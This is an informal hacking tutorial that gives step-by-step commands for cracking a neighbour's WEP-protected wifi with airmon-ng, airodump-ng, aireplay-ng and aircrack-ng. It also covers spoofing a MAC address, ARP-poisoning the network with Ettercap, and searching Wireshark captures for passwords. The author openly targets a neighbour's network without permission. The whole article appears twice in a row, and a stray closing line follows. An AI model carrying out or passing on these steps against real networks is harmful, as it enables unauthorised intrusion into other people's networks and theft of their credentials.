-What I will be Going Over-
In this article, I don't plan on giving you any bullshit. I don't plan on hinting towards how
to break into a wifi network, I will show you how to break into a wifi network. I will do it simple
steps, and only break them down if I feel that you will need it or can benefit from knowing it.
The following subjects I will touch on include the following:
1. Brief Introduction to Backtrack
2. Cracking the WEP Key (we will go over WEP cracking, I may write another one on
WPA a bit later...)
3. MITM Attack
4. Basic Network Analysis
-Brief Introduction to Backtrack-
Backtrack is something that is essential, in my opinion, to be in any hackers toolbox.
It is a live-linux cd that is compatible with most laptops (Just for reference sake, I am
using my Eee PC with an external DVDRom drive to boot it). All you have to do is go to
www.remoteexploit. org and download the ISO that fits what you would like
to use it on (CD, DVD, or USB/SD). Once you do that, you will need to to stick the
CD/DVD/USB/SD into your laptop, and restart. When you restart, you must hit whatever
key you need to do load the boot options, for most computers it's F8 or F9, for mine, it's the
ESC key. Once you boot into it, you will have to go through a few menus, basically all you
have to do is keep hitting enter until theKDE loads. When the boot is finished, you should
see a screen similar to this:
-Cracking the WEP Key-
Note: For reference, since not all parameters are the same for each laptop,
I have put them as variables ($) where you plug in what is necessary for you.
1. Open a new shell prompt:
1. Type airmon-ng to see what interfaces are available. As you can see I have 2
interfaces, wifi0 and ath0, but wifi0 is the parent of ath0, so this will be a bit tricky
. Most laptops only have one interface.
2. Type airmon-ng stop ath0 to stop the ath0 interface
3. Type airmon-ng start wifi0 so it puts ath0 into monitor mode
4. Type clear to clear the screen then type ifconfig ath0 down
5. Now we need to change the MAC address, to do this type macchanger –mac
00:11:22:33:44:55 ath0
6. Now we need to turn our interfaces back on by typing airmon-ng start wifi0
7. Now we get down to the meat and bones, we can start scanning for networks by
typing in airodump-ng ath0
8. If you already know the ESSID of the network you would like to crack the WEP key for,
go right ahead and crack it, but because I am doing this on a neighbor, I took a guess that
it was the one with the highest PWR. Which is linksys---- (blocked out for security purposes)
9. Now we are going to single that network out by typing in the following:
airodump-ng -c $CHANNEL -w wepcrack –bssid $BSSID ath0
10.Now our goal is to get the #Data field to reach around 10,000 (just to be safe)
so we have to provoke the data by first associating ourselves with the network.
Do this by typing aireplay-ng -1 0 -a $BSSID -h 00:11:22:33:44:55 -e $ESSID ath0
i don't think I would need to break this down for you, to do this, I am sure you can
just look at what I did for each of the variables and plug in your own.
11.Now that were associated, we can start sending packets back to the network,
therfore increasing the amount in the #Data field. We do this by typing in aireplay-ng -3 -b
$BSSID -h 00:11:22:33:44:55 ath012.Once you think the #Data has climbbed to a
decent amount, open a new shell prompt and type the following:
aircrack-ng -n 64 -b $BSSID wepcrack-01.cap
Congratulations! We just cracked our first WEP key. Now what I am going to do is
restart my laptop and boot into my regular OS and connect to the network now that
I have the WEP key. -MITM Attack-In order to intercept their packets, we will need to
find some way to take all theirinternet traffic, forward it to our laptop, then to the
internet. How do we do this? Yup, a MITM attack. Here is a simple picture to demonstrate:
So now you may be asking, how do I do this!? Ettercap is the answer, if your doing
this on a Windows machine, your going to have to google it to install it, but if your on
*nix, you can download and install it simply by typing sudo apt-get install ettercap
Once it is done, we can open the GUI for it by typing sudo ettercap -G into the shell.
1. Go to Sniff > Unified Sniffing and then choose your interface, mine, of course, is ath0
2. From there go to Hosts > Sccan for Hosts
3. Now we need to see what hosts are up, do this by going to Hosts > Host List
4. Now, since it is common sense that usually the *.*.*.1 IP is the router, we are
going to highlight that, and click Add to Target 1, and since I don't know what all
the other IP's go to, I will highlight all the other IP's and click Add to Target 2
5. Go to MITM > arp poisoning and press ok, don't check any of the boxes.
6. Now go to Start > Sniffer
7. Minimize ettercap
-Basic Network Analysis-
Finally, we can now start analyzing traffic from their network, this does take a lot of
patience and luck though, because they have to be using the internet at the exact
time that you are connected to their network. What I did was simply left my laptop
running for about an hour during the evening.
1. Download wireshark by typing sudo apt-get install wireshark, if your on Windows,
again, google it. You can open it by simply typing sudo wireshark into a shell
2. Go to Capture > Interfaces and choose the interface you would like to use. To choose it,
click Start that is next to the interface, you can kind of get an idea of what interface to use
because of the amount of packets going in and out of it.
NOTE: DO NOT CHOOSE ANY, it won't work.
3. Now we just have to sit back and wait till we get a bunch of packets, I left mine
running for about an hour and gathered about 35,000 packets. As you can imagine,
that is a lot of packets to skim through on a laptop, and will take forever to search for one query, so
I have saved the pcap file (file > save) and will analyze it on my desktop machine,
which has a bit more capacity to handle things like this quicker.
4. Now that we have all these packets, we can start looking for certain filters, to do
this press CTRL+F and click the By String bubble.
5. Since I would like some passwords, type password into it, and see what we get.
6. Success! As you can see below, it found a packet that has the word password in it!
7. Now we must right click the packet highlighted, and go to Follow TCP Stream you
will be prompted with something that looks like this:
In this article, I don't plan on giving you any bullshit. I don't plan on hinting towards how
to break into a wifi network, I will show you how to break into a wifi network. I will do it simple
steps, and only break them down if I feel that you will need it or can benefit from knowing it.
The following subjects I will touch on include the following:
1. Brief Introduction to Backtrack
2. Cracking the WEP Key (we will go over WEP cracking, I may write another one on
WPA a bit later...)
3. MITM Attack
4. Basic Network Analysis
-Brief Introduction to Backtrack-
Backtrack is something that is essential, in my opinion, to be in any hackers toolbox.
It is a live-linux cd that is compatible with most laptops (Just for reference sake, I am
using my Eee PC with an external DVDRom drive to boot it). All you have to do is go to
www.remoteexploit. org and download the ISO that fits what you would like
to use it on (CD, DVD, or USB/SD). Once you do that, you will need to to stick the
CD/DVD/USB/SD into your laptop, and restart. When you restart, you must hit whatever
key you need to do load the boot options, for most computers it's F8 or F9, for mine, it's the
ESC key. Once you boot into it, you will have to go through a few menus, basically all you
have to do is keep hitting enter until theKDE loads. When the boot is finished, you should
see a screen similar to this:
-Cracking the WEP Key-
Note: For reference, since not all parameters are the same for each laptop,
I have put them as variables ($) where you plug in what is necessary for you.
1. Open a new shell prompt:
1. Type airmon-ng to see what interfaces are available. As you can see I have 2
interfaces, wifi0 and ath0, but wifi0 is the parent of ath0, so this will be a bit tricky
. Most laptops only have one interface.
2. Type airmon-ng stop ath0 to stop the ath0 interface
3. Type airmon-ng start wifi0 so it puts ath0 into monitor mode
4. Type clear to clear the screen then type ifconfig ath0 down
5. Now we need to change the MAC address, to do this type macchanger –mac
00:11:22:33:44:55 ath0
6. Now we need to turn our interfaces back on by typing airmon-ng start wifi0
7. Now we get down to the meat and bones, we can start scanning for networks by
typing in airodump-ng ath0
8. If you already know the ESSID of the network you would like to crack the WEP key for,
go right ahead and crack it, but because I am doing this on a neighbor, I took a guess that
it was the one with the highest PWR. Which is linksys---- (blocked out for security purposes)
9. Now we are going to single that network out by typing in the following:
airodump-ng -c $CHANNEL -w wepcrack –bssid $BSSID ath0
10.Now our goal is to get the #Data field to reach around 10,000 (just to be safe)
so we have to provoke the data by first associating ourselves with the network.
Do this by typing aireplay-ng -1 0 -a $BSSID -h 00:11:22:33:44:55 -e $ESSID ath0
i don't think I would need to break this down for you, to do this, I am sure you can
just look at what I did for each of the variables and plug in your own.
11.Now that were associated, we can start sending packets back to the network,
therfore increasing the amount in the #Data field. We do this by typing in aireplay-ng -3 -b
$BSSID -h 00:11:22:33:44:55 ath012.Once you think the #Data has climbbed to a
decent amount, open a new shell prompt and type the following:
aircrack-ng -n 64 -b $BSSID wepcrack-01.cap
Congratulations! We just cracked our first WEP key. Now what I am going to do is
restart my laptop and boot into my regular OS and connect to the network now that
I have the WEP key. -MITM Attack-In order to intercept their packets, we will need to
find some way to take all theirinternet traffic, forward it to our laptop, then to the
internet. How do we do this? Yup, a MITM attack. Here is a simple picture to demonstrate:
So now you may be asking, how do I do this!? Ettercap is the answer, if your doing
this on a Windows machine, your going to have to google it to install it, but if your on
*nix, you can download and install it simply by typing sudo apt-get install ettercap
Once it is done, we can open the GUI for it by typing sudo ettercap -G into the shell.
1. Go to Sniff > Unified Sniffing and then choose your interface, mine, of course, is ath0
2. From there go to Hosts > Sccan for Hosts
3. Now we need to see what hosts are up, do this by going to Hosts > Host List
4. Now, since it is common sense that usually the *.*.*.1 IP is the router, we are
going to highlight that, and click Add to Target 1, and since I don't know what all
the other IP's go to, I will highlight all the other IP's and click Add to Target 2
5. Go to MITM > arp poisoning and press ok, don't check any of the boxes.
6. Now go to Start > Sniffer
7. Minimize ettercap
-Basic Network Analysis-
Finally, we can now start analyzing traffic from their network, this does take a lot of
patience and luck though, because they have to be using the internet at the exact
time that you are connected to their network. What I did was simply left my laptop
running for about an hour during the evening.
1. Download wireshark by typing sudo apt-get install wireshark, if your on Windows,
again, google it. You can open it by simply typing sudo wireshark into a shell
2. Go to Capture > Interfaces and choose the interface you would like to use. To choose it,
click Start that is next to the interface, you can kind of get an idea of what interface to use
because of the amount of packets going in and out of it.
NOTE: DO NOT CHOOSE ANY, it won't work.
3. Now we just have to sit back and wait till we get a bunch of packets, I left mine
running for about an hour and gathered about 35,000 packets. As you can imagine,
that is a lot of packets to skim through on a laptop, and will take forever to search for one query, so
I have saved the pcap file (file > save) and will analyze it on my desktop machine,
which has a bit more capacity to handle things like this quicker.
4. Now that we have all these packets, we can start looking for certain filters, to do
this press CTRL+F and click the By String bubble.
5. Since I would like some passwords, type password into it, and see what we get.
6. Success! As you can see below, it found a packet that has the word password in it!
7. Now we must right click the packet highlighted, and go to Follow TCP Stream you
will be prompted with something that looks like this:
Requested To Avoid Spam